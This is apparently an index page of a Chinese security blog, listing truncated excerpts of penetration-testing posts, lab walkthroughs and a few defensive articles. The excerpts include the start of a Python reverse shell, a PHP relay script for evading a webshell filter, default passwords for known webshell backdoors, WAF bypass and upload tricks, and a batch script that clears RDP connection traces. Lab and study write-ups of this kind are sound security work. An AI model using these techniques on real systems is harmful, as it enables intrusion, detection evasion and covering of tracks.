利用python模拟菜刀反弹shell绕过限制利用python模拟菜刀反弹shell绕过限制
有的时候我们在获取到目标电脑时候如果对方电脑又python 编译环境时可以利用python 反弹shell
主要用到python os库和sokect库
这里的服务端在目标机上运行
from socket import *
from os import *
s=socket(A...[2019/7/12]
利用hash远程登陆系统利用hash远程登陆系统
有的时候当我们拿到系统管理员hash由于密码复杂度过高无法破解时候可以利用hash直接进行远程登录
我们用到Metasploit里面的模块 肉鸡为windwos server 2003 x32系统
1.利用抓哈希工具PwDump7.exe获取哈希
菜刀输入打开命令执行 PwDum...[2019/7/12]
Vulnhub靶场渗透练习(一) Breach1.0
打开靶场 固定ip需要更改虚拟机为仅主机模式 192.168.110.140
打开网页http: 192.168.110.140/index.html
查看源代码发现可以加密字符串
猜测base64 解密 cGdpYmJ...[2019/7/12]
Vulnhub靶场渗透练习(二) Billu_b0x
运行虚拟机直接上nmap扫描 获取靶场ip
nmap 192.168.18.*
开放端口
TCP 22 SSH OpenSSH 5.9p1
TCP 80 HTTP Apache httpd 2.2.22
192.168.18.143 打开页面 爆破路径...[2019/7/12]
Vulnhub靶场渗透练习(三) bulldog
拿到靶场后先对ip进行扫描
获取ip 和端口
针对项目路径爆破
获取两个有用文件
http: 192.168.18.144/dev/
dev,admin
更具dev 发现他们用到框架和语言 找到一个 shell 连接
http:...[2019/7/12]
Vulnhub靶场渗透练习(四) Acid
利用namp 先进行扫描获取ip
nmap 192.168.18.*
获取ip 没发现80端口 主机存活 猜测可以是个2000以后的端口
nmap -p1-65533 192.168.18.146 返回
192....[2019/7/12]
Vulnhub靶场渗透练习(五) Lazysysadmin
第一步扫描ip nmap 192.168.18.* 获取ip 192.168.18.147
扫描端口
root@kali:~# ma can 192.168.18.147 -p 1-10000 --rate=1000
Starting ma...[2019/7/12]
各类黑客大马默认密码后门
通过goole hack 语法 搜索 incontent: xx黑客 留的后门
黑羽基地免杀asp大马 密码5201314
Hacked By CHINA! 密码china
Asp站长助手6.0 密码584521
web综合安全评测 - Beta3 密码nohack
未知...[2019/7/12]
i春秋DMZ大型靶场实验(一)内网拓展i春秋DMZ大型靶场实验(一)内网拓展
更具提示 先下载工具包
ip 172.16.12.226 打开bp 进行代理发现 整个页面 没有请求
没有其页面通过 御剑,dir ,hscan 进行目录爆破未发现有用...[2019/7/12]
大文件数据如何做到安全传输?大文件数据如何做到安全传输?
目前企业文件型数据量激增,但当下众多企业还通常使用邮件、IM工具、FTP、网盘等常规方式进行文件传输,当文件容量增大,网络环境变差时,文件传输和数据交换效率低下,安全性差。如果文件更大时,通常会采用快递硬盘等更低下的方式,因而不能满足企业及时获取文件的要求,严重影响企业整体运行效率。
另外...[2019/7/12]
i春秋DMZ大型靶场实验(一)内网拓展
更具提示 先下载工具包
ip 172.16.12.226 打开bp 进行代理发现 整个页面 没有请求
没有其页面通过 御剑,dir ,hscan 进行目录爆破未发现有用...[2019/7/11]
各类黑客大马默认密码后门
通过goole hack 语法 搜索 incontent: xx黑客 留的后门
黑羽基地免杀asp大马 密码5201314
Hacked By CHINA! 密码china
Asp站长助手6.0 密码584521
web综合安全评测 - Beta3 密码nohack
未知...[2019/7/10]
内存取证工具-volatility、foremost
内存取证
1. 内存取证工具volatility
猜测dump文件的profile值
root@kali:~/CTF# volatility -f mem.vmem imageinfo
Volatility Foundation Volatility Framework 2.6
INFO :...[2019/7/10]
Vulnhub靶场渗透练习(四) Acid
利用namp 先进行扫描获取ip
nmap 192.168.18.*
获取ip 没发现80端口 主机存活 猜测可以是个2000以后的端口
nmap -p1-65533 192.168.18.146 返回
...[2019/7/9]
Vulnhub靶场渗透练习(五) Lazysysadmin
第一步扫描ip nmap 192.168.18.* 获取ip 192.168.18.147
扫描端口
root@kali:~# ma can 192.168.18.147 -p 1-10000 --rate=1000
Starti...[2019/7/9]
Vulnhub靶场渗透练习(三) bulldog
拿到靶场后先对ip进行扫描
获取ip 和端口
针对项目路径爆破
获取两个有用文件
http: 192.168.18.144/dev/
dev,admin
更具dev 发现他们用到框架和语言 找到一个 shell 连接
...[2019/7/8]
Vulnhub靶场渗透练习(一) Breach1.0
打开靶场 固定ip需要更改虚拟机为仅主机模式 192.168.110.140
打开网页http: 192.168.110.140/index.html
查看源代码发现可以加密字符串
猜测base64 解密 ...[2019/7/8]
Vulnhub靶场渗透练习(二) Billu_b0x
运行虚拟机直接上nmap扫描 获取靶场ip
nmap 192.168.18.*
开放端口
TCP 22 SSH OpenSSH 5.9p1
TCP 80 HTTP Apache httpd 2.2.22
192.168.18.143 打开页面 爆破路径...[2019/7/8]
利用hash远程登陆系统
有的时候当我们拿到系统管理员hash由于密码复杂度过高无法破解时候可以利用hash直接进行远程登录
我们用到Metasploit里面的模块 肉鸡为windwos server 2003 x32系统
1.利用抓哈希工具PwDump7.exe获取哈希
菜刀输入打开命令执行 Pw...[2019/7/2]
配置linux 防火墙,只有固定IP和端口才能能访问完美解决
添加开放的端口和固定ip
vi /etc ysconfig/iptables
[root@root220156 /]# echo "unset MAILCHECK">> /etc/profile 禁止弹出发邮件
开启固定ip和端口访问配置:
...[2019/6/28]
SQLi-LABS Page-3 (order by injections) Less-46-Less-53 - APT-101
关于order by 注入原理讲解
注入原理
1. 测试
?sort=1 desc--+?sort=1 asc--+显示结果不同,说明可以注入
desc是 descend 降序意思
asc 是 ascend 升序意思
可利用 order by 后的一些参数进行注...[2019/6/28]
利用python模拟菜刀反弹shell绕过限制
有的时候我们在获取到目标电脑时候如果对方电脑又python 编译环境时可以利用python 反弹shell
主要用到python os库和sokect库
这里的服务端在目标机上运行
from socket import *
from os import *
s=socket(A...[2019/6/26]
WebApp 安全风险与防护课堂开课了!WebApp 安全风险与防护课堂开课了!
本文由葡萄城技术团队于原创并首发
转载请注明出处:葡萄城官网,葡萄城为开发者提供专业的开发工具、解决方案和服务,赋能开发者。
2018 网络安全事故频发,从数据泄露、信息窃取,到 DDOS 攻击、勒索病毒,不仅威胁的总数在增加,威胁态势也变得更加多样化,攻击者在不...[2019/6/26]
Burpsuite抓取https数据包
Burpsuite抓取https包
浏览器代理设置
Burpsuite代理设置
启动Burpsuite,浏览器访问127.0.0.1:8080,点击CA Certificate,...[2019/6/21]
SQLi-LABS Page-1(Basic Challenges) Less11-Less22 - APT-101
Le -11
GET - Blind - Time based - double quotes
http: 10.10.202.112 qli/Le -11/
尝试登录:
username:admin''
pa word: 1
You have an error in...[2019/6/21]
SQLi-LABS Page-1(Basic Challenges) Less5-Less10 - APT-101
Le 5
GET - Double Injection - Single Quotes
http: 10.10.202.112 qli/Le -5?id=1
http: 10.10.202.112 qli/Le -5?id=1''
You have an e...[2019/6/19]
预防SQL注入笔记
SQL注入如何预防?
本文参考自owasp,重点是提供清晰,简单,可操作的指导,以防止应用程序中的SQL注入漏洞。不幸的是,SQL注入攻击很常见,这是由于两个因素:
SQL注入漏洞的显着流行
目标的吸引力(即数据库通常包含应用程序的所有有趣/关键数据)。
发生了如此多的成功SQL...[2019/6/19]
php中转菜刀脚本过狗免杀
<?php
$target="url"; shell 地址 菜刀连这个脚本做中转
$post='''';
$i=0;
foreach($_POST AS $K=>$V)
{
if(strstr($v,"base64_decode"))
{
...[2019/6/17]
mysql 堆注入写shell
如果一个平台有注入点的时候可以通过写一句话拿shell
条件
1.myql 5.6.34 版本区分
2.有写的权限
3.知道绝对路径
MySQL 中 在在mysql 5.6.34版本以后 secure_file_priv的值默认为NUL...[2019/6/14]
开发人员必备的网络知识(非原创)
文章大纲
一、网络类型介绍二、网络七层协议详细介绍三、其他介绍四、参考文章
一、网络类型介绍
因特网因特网因特网是当今世界上最大的网络, 是”网络的网络”. 即因特网是所有网络互连起来的一个巨型网络.因特网的组成 :(1)...[2019/6/13]
sql注入100种姿势过waf(二):过安全狗
仅供学习交流如果你有更好的思路可以一起分享,想一起学习的进我主页
先去安全狗网站下载最新的安全狗版本
从官网下载 windwos apache版 v4.0.2395 最新版 数据库是mysql 5.6
1.首先判断是否有...[2019/6/10]
软件开发之安全设计软件开发之安全设计
近期在做安全开发生命周期(SDL)相关培训,其中针对安全设计阶段,基于一般的Web应用数据流图,整理了一份checklist结构图,以供参考。
原文链接:http: www.cnblogs.com/canyezhizi/p/10994563.html[2019/6/10]
sql注入100种姿势过waf(一):waf 了解
仅供学习交流如果你有更好的思路可以一起分享,想一起学习的进我主页
首先WAF(Web Application Firewall),俗称Web应用防火墙,主要的目的实际上是用来过滤不正常或者恶意请求包,以及为服务器打上临时补丁的作用。
1、云w...[2019/6/6]
1. 移动安全渗透测试-(环境搭建) - APT-101
Santoku
移动渗透测试中的菜刀
下载:http: antoku-linux.com/download/
预览:
安装JADX
首先需要安装Java8,这里安装为open-jdk8
$ sudo add-apt-repositor...[2019/6/6]
渗透实例(一):点后缀突破上传文件
目标系统 windows+php
1.字典爆破后台路径
2.后台弱口令爆破
3.进去后发现两个上传点 编辑器百度的 无版本漏洞 无法利用 有一个单独的备份模板上传
4.初次上传php后缀 被告知格式不允许 尝试其他后缀
...[2019/6/6]
双文件上传突破利用
这个漏洞在南方cms 上出现的
主要是上传时候利用bp抓包
然后鼠标右键吧数据包发送到Repeater模块
找到你上传的包内容 一般是
------61234564788Content-Disposition: form-data; name="FileName"; f...[2019/6/6]
2. 移动安全渗透测试-(Android安全基础) - APT-101
2.1 Android系统架构
1、应用程序层 平时所见的一些java为主编写的App
2、应用程序框架层 应用框架层为应用开发者提供了用以访问核心功能的API框架
android.app:提供高层的程序模型和基本的运行环境。
android.content:包含对...[2019/6/6]
源代码扫描工具Fortify SCA与FindBugs的简单对比
前段时间因为工作原因需要对java源代码进行扫描,现结合使用经验对静态代码扫描工具Fortify SCA与FindBugs进行一个简单的对比。
一、Fortify SCA
Fortify SCA是由全球领先的软件安全产品解决方案供应商Fortify Software开发,致力于帮助客户在软...[2019/6/6]
IIS6.0使用冒号上传漏洞利用IIS6.0使用冒号上传漏洞利用
利用条件:
1.iis版本为6.0
2.上传文件名不会重命名
利用:
上传一个jpg木马图片 名字为:cs.asp:.jpg 注意是: 默认windows是不允许文件字含:(冒号)的 所以需要抓包后改下!!
上传成功后,iis会忽略掉:后面...[2019/6/5]
利用3389端口监视管理员登录
这里要用到
可以在角色里面安装 终端服务配置
双击 选择环境
管理员进行3389登录时
执行1.bat 文件 也可以是一个恶意的exe
bat 里面写
@echo offdate /t>>log.txt &n...[2019/6/4]
Windows突破远程连接最大数去掉限制登录
当对方设置最大连接数 超过限制时 可以用这个命令
win+r 输入
mstsc /v:192.168.18.131:3389 /console windows server 2003 sp2 以下的版本(包括)
mstsc /v:192.168.18...[2019/6/4]
Zimbra
第一步:利用XXE读取配置文件
这里利用了CVE-2019-9670漏洞来读取配置文件,你需要在自己的VPS服务器上放置一个dtd文件,并使该文件能够通过HTTP访问。为了演示,我在GitHub上创建了一个仓库,从GitHub上获取dtd文件。
上图中用红框圈起来的就是zi...[2019/6/4]
cmd 获取当前登录的用户和远程连接的用户
打开cmd 执行 quser
可以看到我有两个 会话
带> 是我当前的会话
rdp 是远程连接的会话 console 是本机操作 可...[2019/6/4]
Hacking/Penetrating tester bookmark collection - APT-101
Blogs
http: carnal0wnage.blogspot.com/
http: www.mcgrewsecurity.com/
http: www.gnucitizen.org/blog/
http: www.darknet.org.uk/
http: pylogic.net...[2019/6/4]
全面认识nslookup命令及子命令
原文链接:http: www.cnblogs.com/yuanzijian-ruiec/p/10972140.html[2019/6/4]
Windows 批量修改文件后缀名Windows 批量修改文件后缀名
利用ren 文件名替换命令 for循环去批处理
1 @echo off
2 for %%m in (*) do (
3 if not "%%m"=="temp.bat"(
4 ren %%m %%~nm.bat
5 )
6 )
另存temp.bat 放到你要批量改名的文件...[2019/6/3]
关于初级安全工程师的培训思路或大纲整理
原文链接:http: www.cnblogs.com/baihualin/p/10954567.html[2019/6/3]
XSS原理及其相应工具使用
XSS(厉害程度:只要js能实现什么功能,x 就能对client造成什么伤害):
原理:通过web站点漏洞,向客户端交付恶意脚本代码,实现对客户端的攻击目的
主要攻击目的(网页挂马:通过XSS向前端页面插入一个包含恶意js的链接,cli...[2019/6/3]
3389连接痕迹清除
@echo off
set /p fk= 确定要清空3389连接痕迹吗?(y/n)
if /i "%fk%"=="y" goto y
if /i "%fk%"=="n" goto n
call %0
:y
reg delete "HKEY_CURRENT_USER\Software\Micro...[2019/6/3]
dos命令创建批处理脚本
win+r 打开cmd
输入 copy con 1.bat 回车 进入编辑状态输入
@echo off
echo xxxx
Ctrl+z 结束编辑 会在当前目录生成一个bat文件
&nbs...[2019/6/3]